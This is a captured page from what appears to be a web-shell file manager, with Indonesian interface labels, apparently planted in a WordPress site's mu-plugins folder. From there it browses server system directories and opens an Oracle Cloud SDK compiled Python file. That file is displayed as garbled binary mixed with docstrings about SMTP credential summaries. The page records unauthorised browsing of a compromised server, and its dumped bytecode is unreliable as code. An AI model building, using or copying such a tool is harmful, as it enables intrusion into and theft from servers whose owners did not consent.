📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
identity
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/identity/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: smtp_credential_summary.pyc
a O��f+ � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s e Zd ZdZdZdZdZdZdZdd� Z e d d � �Zejdd � �Ze dd � �Z e jdd � �Z e dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejd d� �Zd!d"� Zd#d$� Zd%d&� Zd'S )(�SmtpCredentialSummarya As the name suggests, an `SmtpCredentialSummary` object contains information about an `SmtpCredential`. The SMTP credential is used for SMTP authentication with the `Email Delivery Service`__. __ https://docs.cloud.oracle.com/Content/Email/Concepts/overview.htm �CREATING�ACTIVE�INACTIVE�DELETING�DELETEDc K sd ddddddddd�| _ ddddd d ddd�| _d | _d | _d | _d | _d | _d | _d | _d | _ d S )ad Initializes a new SmtpCredentialSummary object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param username: The value to assign to the username property of this SmtpCredentialSummary. :type username: str :param id: The value to assign to the id property of this SmtpCredentialSummary. :type id: str :param user_id: The value to assign to the user_id property of this SmtpCredentialSummary. :type user_id: str :param description: The value to assign to the description property of this SmtpCredentialSummary. :type description: str :param time_created: The value to assign to the time_created property of this SmtpCredentialSummary. :type time_created: datetime :param time_expires: The value to assign to the time_expires property of this SmtpCredentialSummary. :type time_expires: datetime :param lifecycle_state: The value to assign to the lifecycle_state property of this SmtpCredentialSummary. Allowed values for this property are: "CREATING", "ACTIVE", "INACTIVE", "DELETING", "DELETED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type lifecycle_state: str :param inactive_status: The value to assign to the inactive_status property of this SmtpCredentialSummary. :type inactive_status: int �str�datetime�int)�username�id�user_id�description�time_created�time_expires�lifecycle_state�inactive_statusr r �userIdr �timeCreated�timeExpires�lifecycleState�inactiveStatusN) � swagger_types� attribute_map� _username�_id�_user_id�_description� _time_created� _time_expires�_lifecycle_state�_inactive_status)�self�kwargs� r( ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/identity/models/smtp_credential_summary.py�__init__( s4 )��zSmtpCredentialSummary.__init__c C s | j S )z� Gets the username of this SmtpCredentialSummary. The SMTP user name. :return: The username of this SmtpCredentialSummary. :rtype: str �r �r&